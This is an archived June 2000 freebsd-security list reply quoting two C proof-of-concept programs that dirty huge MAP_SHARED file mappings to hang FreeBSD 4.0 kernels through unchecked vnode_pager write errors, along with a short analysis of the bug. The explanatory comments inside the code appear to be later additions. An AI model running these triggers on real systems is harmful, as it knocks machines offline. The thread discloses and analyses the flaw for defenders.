Date:      Fri, 2 Jun 2000 12:04:50 -0700 (PDT)
From:      Sergio Valdes-Flores <sergiovf@excite.com>
To:        freebsd-security@freebsd.org
Subject:   Re: FreeBSDDEATH.c.txt (mmap dirty page no check bug)
Message-ID:  <21786238.959972690834.JavaMail.imail@knuckles.excite.com>

http://ls.si.ru/tmp/FreeBSDDEATH-2.c (dash not dot)
this is the page:
-----------------
/*
From: <mike@haali.po.cs.msu.su>

Create 1GB file, fill it with 1s. The kernel (may|will) hang.
*/

/*
 * Historical (June 2000) proof-of-concept for the FreeBSD 4.0-STABLE
 * vnode_pager dirty-page writeback bug analysed in the quoted mail below:
 * errors returned by VOP_PUTPAGES()/VOP_WRITE() while flushing dirty
 * MAP_SHARED pages were not propagated, so an ENOSPC or other I/O error
 * during writeback could hang the kernel. Its value today is as a
 * regression case for error propagation in the pager, not as a tool.
 *
 * The archive left this listing quoted-printable encoded ("=3D" is "=",
 * "=20" is a trailing space, a line ending in "=" is a soft line break
 * joined with the next one), so it does not compile as shown. It also
 * has no #include lines at all and relies on implicit declarations of
 * mkstemp(), ftruncate(), mmap(), memset(), munmap() and close().
 * argc/argv are unused.
 */
int   main(int argc,char **argv) {
  int   pages=3D256*1024;        /* 262144 pages * 4096 = 1 GiB; still fits a 32-bit int */
  char  *p;
  int   fd,i;
  char  filename[]=3D"./junk.XXXXXXXX";  /* mkstemp() template; the file is never unlinked */
  fd=3Dmkstemp(filename);       /* return value unchecked: -1 on failure */
  ftruncate(fd,pages*4096);     /* grow the file to 1 GiB; result unchecked */
=20
p=3D(char*)mmap(NULL,pages*4096,PROT_READ|PROT_WRITE,MAP_SHARED|MAP_NOSYNC,=
fd,0);
  /* Shared, writable mapping of the whole file. MAP_NOSYNC is FreeBSD-
   * specific: it asks the kernel not to flush the dirty pages periodically,
   * leaving them to be written back later by the vnode pager -- the path
   * (vnode_pager_putpages(), per the quoted analysis) whose write errors
   * went unchecked. MAP_FAILED is never tested for. */
  for (i=3D0;i<pages;i++)
    memset(p+i*4096,1,4096);    /* dirty every page of the mapping */
  munmap(p,pages*4096);
  close(fd);
  return 0;
}

_---------------------
On Fri, 2 Jun 2000 14:09:06 +0100, User Datagram Protocol wrote:

>  Yo,
> 
>  This seems to be doing the rounds with the script kiddies fairly quickly.
>  I've attached it.
>  (originally found at: http://ls.si.ru/tmp/FreeBSDDEATH.c.txt - dumped
>  by some skr1pt k1dd1es on irc)
> 
>  vnode_pager_putpages() only does this check against the return value of
>  VOP_PUTPAGES():
>          rtval = VOP_PUTPAGES(vp, m, bytes, sync, rtvals, 0);
>          if (rtval == EOPNOTSUPP) {
> 
>  And vnode_pager_generic_putpages() appears to force the return value for
>  all page writes that it does to VM_PAGER_OK even when an error occurs in
>  VOP_WRITE().
> 
>  The above is based on a quick inspection of the 4.0-STABLE fork source tree.
>  So, this guy has a point.
>  Apologies if this issue was posted to any other lists, but it came my way,
>  I am not currently on bugtraq due to some mail issues, and it looks like
>  something we should be aware of (albeit really a quality of implementation
>  issue that gets hit during times of high load - like something else I have
>  in the pipeline. Heh.)
> 
>  Regards
>  -- 
>  Bruce M. Simpson aka 'udp'       Security Analyst & UNIX Development Engineer
>                                              WWW:      www.closed-networks.com/~udp
>  Dundee                                                www.packetfactory.net/~udp
>  United Kingdom                            email:      udp@closed-networks.com
>  /*
>  From: Oleg Derevenetz <Oleg.Derevenetz@p4.f3.n5025.z2.fidonet.org>
>  Date: Wed, 31 May 2000 19:04:12 +0400
>  Subject: mmap
>  Message-ID: <959790285@p4.f3.n5025.z2.ftn>
> 
>  Draft English translation: in vnode_pager.c there is no check at all for
>  errors on writing dirty mmap'ed pages to disk. If there is not enough
>  space, or any other I/O error occurs, the results will be very bad.
> 
>  It would be good to kill the calling process, but it's hard to find out
>  the owner of the offending page.
> 
>  Дело в том, что в vnode_pager.c не предусмотрена никакая обработка
>  ошибок при сбросе грязных mmap'ленных страниц файла на диск, если на
>  диске недостаточно места для такого сброса (да и вообще при любой ошибке
>  I/O), и это приводит к очень плохим результатам. Где-то полгода назад я
>  переписывался с людьми из freebsd.hackers, они меня по большому счету
>  просто послали. VM сделана достаточно криво, поэтому мне придумать
>  реакцию на такую проблему пока не удалось. Желательно было бы прибить
>  процесс, но извлечь информацию о том, какому процессу принадлежит
>  страница, при сбросе которой произошла ошибка, весьма затруднительно.
>  Вот сижу сейчас, ломаю голову, что делать...
> 
>  Кстати, а здесь никто не занимается ядерным VM ?
>  */
> =20
>  #include <sys/types.h>
>  #include <sys/mman.h>
>  #include <stdio.h>
>  #include <string.h>
>  #include <fcntl.h>
>  #include <errno.h>
> =20
>  #define COUNT   1024*1024
>  #define SIZE    10*1024*1024
> =20
>  /*
>   * Earlier PoC quoted from the fidonet mail above: in a loop, create a
>   * sparse file, map it MAP_SHARED and dirty every byte, so that the
>   * dirty-page writeback path whose errors vnode_pager.c did not check is
>   * reached once the filesystem fills up.
>   *
>   * Still quoted-printable encoded by the archive ("=3D" is "=", "=20" is
>   * a trailing space, a line ending in "=" is a soft line break; the
>   * mmap() call is split over three archive lines). Defects visible in the
>   * listing itself: open()'s mode is the decimal literal 644 rather than
>   * octal 0644; open(), lseek() and write() results are unchecked; nothing
>   * is ever munmap()ed or close()d, so mappings and descriptors accumulate
>   * each iteration; errno is printed after a successful mmap(), where it
>   * carries no information; and an mmap() failure exits with status 0.
>   */
>  int main () {
>      int i,j,fd;
>      char *fptr, fname [16];   /* "%d" of i < COUNT is at most 7 digits + NUL */
>     =20
>      for (i=3D0;i<COUNT;i++) {
>          sprintf (fname, "%d", i);   /* one file per iteration, named by its index */
>          printf ("DEBUG: fname: %s\n", fname); fflush (stdout);
>         =20
>          fd=3Dopen (fname, O_RDWR|O_CREAT, 644);   /* 644 is decimal here, not 0644 */
>          lseek (fd, SIZE, SEEK_SET);   /* seek past EOF ... */
>          write (fd, "-", 1);           /* ... and write one byte: SIZE+1 bytes, mostly a hole */
>          printf ("DEBUG: write\n"); fflush (stdout);
>         =20
>          if ((fptr=3Dmmap (NULL, SIZE, PROT_READ|PROT_WRITE, MAP_SHARED, =
fd,

>                   0))=3D=3DMAP_FAILED) {
>              printf ("mmap() failed !\n"); fflush (stdout);
>              return 0;   /* failure reported with exit status 0 */
>          }
>          printf ("DEBUG: mmap, errno=3D%d\n", errno); fflush (stdout);   /* errno is stale: mmap() succeeded */
>         =20
>          for (j=3D0;j<SIZE;j++)
>              fptr[j]=3D'o';   /* dirty every byte of the shared mapping */
>          printf ("DEBUG: fill\n"); fflush (stdout);
>          /* no munmap()/close(): mapping and fd stay live into the next iteration */
>      }
>     =20
>      return 0;
>  }











